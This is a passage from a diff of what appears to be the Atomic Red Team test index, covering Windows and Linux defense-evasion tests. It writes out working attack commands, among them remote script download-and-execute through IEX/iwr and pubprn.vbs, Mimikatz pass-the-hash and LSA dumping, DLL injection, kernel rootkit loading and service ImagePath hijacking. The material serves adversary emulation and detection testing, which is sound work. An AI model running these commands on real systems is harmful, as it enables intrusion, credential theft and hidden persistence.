2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. -' + ' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} -' + ' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. -' + ' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -' + ' name: command_prompt T1542.004: technique: @@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) -' + ' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) -' + ' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension -' + ' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file -' + ' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) -' + ' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" -' + ' executor: name: command_prompt elevation_required: false @@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond -' + ' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) -' + ' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" @@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe -' + ' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore -' + ' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} -' + ' cleanup_command: 'sudo rmmod #{rootkit_name} -' + ' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} -' + ' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. -' + ' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); -' + ' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) -' + ' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. -' + ' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} -' + ' name: command_prompt T1134.005: technique: @@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} -' + ' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" -' + ' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB -' + ' supported_platforms: - windows input_arguments: @@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} -' + ' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} -' + ' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. -' + ' supported_platforms: - windows input_arguments: @@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided -' + ' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." -' + ' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." -' + ' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt -' + ' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" -' + ' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' @@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" -' + ' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. -' + ' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe -' + ' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} 